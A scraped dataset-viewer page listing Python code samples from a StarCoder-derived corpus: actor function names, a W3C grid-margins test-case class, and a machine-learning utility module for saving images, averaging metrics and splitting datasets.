get_actor_name()
get_actor_id()
save_actor_id()
get_actor_movie_count()
save_actor_movie_count()
get_actor_movie_info()
|
StarcoderdataPython
|
162035
|
from tests.utils import W3CTestCase
class TestGridMarginsNoCollapse(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'grid-margins-no-collapse-'))
|
StarcoderdataPython
|
1782643
|
<gh_stars>1-10
from torch.utils.data import Subset
from sklearn.model_selection import train_test_split
import json
import cv2
import numpy as np
import random
def tensor_imwrite(img, name):
temp = np.transpose(img.cpu().numpy(), (1, 2, 0))
temp = (temp * 255).astype(np.uint8)
cv2.imwrite(name, temp)
def numpy_imwrite(img, name):
temp = np.transpose(img, (1, 2, 0))
temp = (temp * 255).astype(np.uint8)
cv2.imwrite(name, temp)
def tensor_visualizer(img_tensor, aug_img_tensor, idx=-1):
if idx == -1:
idx = random.randint(0, len(img_tensor)-1)
img_tensor_len = len(img_tensor)
aug_len = int(len(aug_img_tensor)/len(img_tensor))
tensor_imwrite(img_tensor[idx], "origin.png")
for i in range(aug_len):
tensor_imwrite(aug_img_tensor[idx + img_tensor_len*i], "aug{}.png".format(i))
def average_dicts(array):
result = {}
for key in array[0].keys():
result[key] = []
for dictt in array:
for key in dictt.keys():
result[key].append(dictt[key])
for key in result:
result[key] = sum(result[key]) / len(result[key])
return result
def print_square(dictionary):
for key in dictionary.keys():
if "float" in str(type(dictionary[key])):
newval = round(float(dictionary[key]), 4)
dictionary[key] = newval
front_lens = []
back_lens = []
for key in dictionary.keys():
front_lens.append(len(key))
back_lens.append(len(str(dictionary[key])))
front_len = max(front_lens)
back_len = max(back_lens)
strings = []
for key in dictionary.keys():
string = "| {0:<{2}} | {1:<{3}} |".format(key, dictionary[key], front_len, back_len)
strings.append(string)
max_len = max([len(i) for i in strings])
print("-"*max_len)
for string in strings:
print(string)
print("-" * max_len)
def train_val_dataset(dataset, val_split=0.25):
train_idx, val_idx = train_test_split(list(range(len(dataset))), test_size=val_split)
datasets = {}
datasets['train'] = Subset(dataset, train_idx)
datasets['valid'] = Subset(dataset, val_idx)
return datasets
def get_foldername(_path):
if _path[-1]=="/":
path = _path[:-1]
else:
path = _path[:]
last_idx = -1
for i in range(len(path)):
if path[i] == "/":
last_idx = i
return path[last_idx+1:]
def dict_to_txt(dicti, path):
with open(path, 'w') as file:
file.write(json.dumps(dicti))
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.